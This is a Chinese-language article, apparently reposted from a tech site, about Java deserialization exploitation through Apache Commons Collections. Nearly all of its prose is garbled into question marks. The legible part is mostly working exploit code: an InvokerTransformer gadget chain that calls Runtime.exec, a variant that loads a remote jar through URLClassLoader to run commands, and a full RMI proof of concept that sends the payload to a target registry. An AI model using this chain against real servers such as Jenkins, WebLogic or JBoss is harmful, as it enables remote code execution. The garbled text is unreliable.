Java?????л???????
?????51CTO ???????[ 2016/9/21 10:14:25 ] ????????Java ??????????? ???
????Map?????????????Map
????????poc?????????????????????BeforeTransformerMap?????????丳???????TransformedMap??decorate???????????Map???????key??value????transforme??
????TransformedMap.decorate????????????Map??????????????????÷????????????????????????????????Map??????????????Map???????key??????????????(???????????????????????????)?????????????Map???????value????????????????
????TransformedMap.decorate(???Map?? key?????????(??????????????null)?? value?????????(??????????????null));
?????????????????????????????????????????????poc???????Map??value?????????(???????transformer??)??
????poc?ж?BeforeTransformerMap??value???????????BeforeTransformerMap??value??????????????????????????????С?
????????з????л????????????ObjectInputStream???readObject()????????????????л???????д??readObject()?????????????з????л????Java???????????д??readObject()??????
??????????Commons Collections??????????????????л???????д??readObject()????????????readObject()?ж?Map???????????????????????????????Map???????????????????????????????
?????????????poc?п????????е????
????Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
???????????????????????????????????TSRC???????
??????????????????poc???????transformer?????????????????????InvokerTransformer??
????InvokerTransformer(String methodName?? Class[] paramTypes?? Object[] args)
????????????????????????????????????????? ????????????????????
new InvokerTransformer(
"getMethod"??
new Class[] {String.class?? Class[].class }??
new Object[] {"getRuntime"?? new Class[0] }
)??
new InvokerTransformer(
"invoke"??
new Class[] {Object.class?? Object[].class }??
new Object[] {null?? null }
)??
new InvokerTransformer(
"exec"??
new Class[] {String.class }??
new Object[] {"gedit"}
)
????????????????????????????????????????????
????PS??????Method???invoke(Object obj??Object args[])????????壬???????????дnew Class[] {Object.class?? Object[].class }??
?????????????????????????
????((Runtime)Runtime.class.getMethod("getRuntime"??null).invoke(null??null)).exec("gedit");
????????????????л?transformer??
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Java.net.URLClassLoader.class)??
new InvokerTransformer(
"getConstructor"??
new Class[] {Class[].class}??
new Object[] {new Class[]{Java.net.URL[].class}}
)??
new InvokerTransformer(
"newInstance"??
new Class[] {Object[].class}??
new Object[] { new Object[] { new Java.net.URL[] { new Java.net.URL(url) }}}
)??
new InvokerTransformer(
"loadClass"??
new Class[] { String.class }??
new Object[] { "ErrorBaseExec" }
)??
new InvokerTransformer(
"getMethod"??
new Class[]{String.class?? Class[].class}??
new Object[]{"do_exec"?? new Class[]{String.class}}
)??
new InvokerTransformer(
"invoke"??
new Class[]{Object.class?? Object[].class}??
new Object[]{null?? new String[]{cmd}}
)
};
???????????????? ???????????????????????jar??????? URLClassLoader??????????????????????url????????????????????????????????????????
????????RMI????????????
????tang3?????RMI????????????????????????????????????????????poc??????
????poc????????
Transformer transformedChain = new ChainedTransformer(transformers);
Map BeforeTransformerMap = new HashMap();
innerMap.put("value"?? "value");
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap?? null?? transformedChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? AfterTransformerMap);
InvocationHandler h = (InvocationHandler) instance;
Remote r = Remote.class.cast(Proxy.newProxyInstance(
Remote.class.getClassLoader()??
new Class[]{Remote.class}??
h));
try{
Registry registry = LocateRegistry.getRegistry(ip?? port);
registry.rebind(""?? r); // r is remote obj
}
catch (Throwable e) {
e.printStackTrace();
}
????RMI?????poc?????????????????????????instance?????????????????????????RMI??????е????????????????????????????
???????????????instance
???????????instance ???? InvocationHandler???????h(???instance?????л?????????????instance?????????)
????????h?????Remote????? r??
????????????????????????????? registry
???????????????registry??? ???r
??????Java??RMI?У???????????????????е?jvm???????а?(rebind??????????????????)?Щ??????????RMIЭ?鴫???Щ???л?????????????????????(???????л?)??????????????????????????????????л????С?????remote???????r ???????poc???????????????remote???r?????????
????????漰RMI???????????Java?????л??????
?????????????
????Java?????л????????????????2?????????????????????к????shell???????????л??????????У???????????У???????????????????(?л??????????к??????о?????????jar????????????)????????????????а?????????jenkins??weblogic??jboss????????????ù???????????ù??????????????????????????????????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com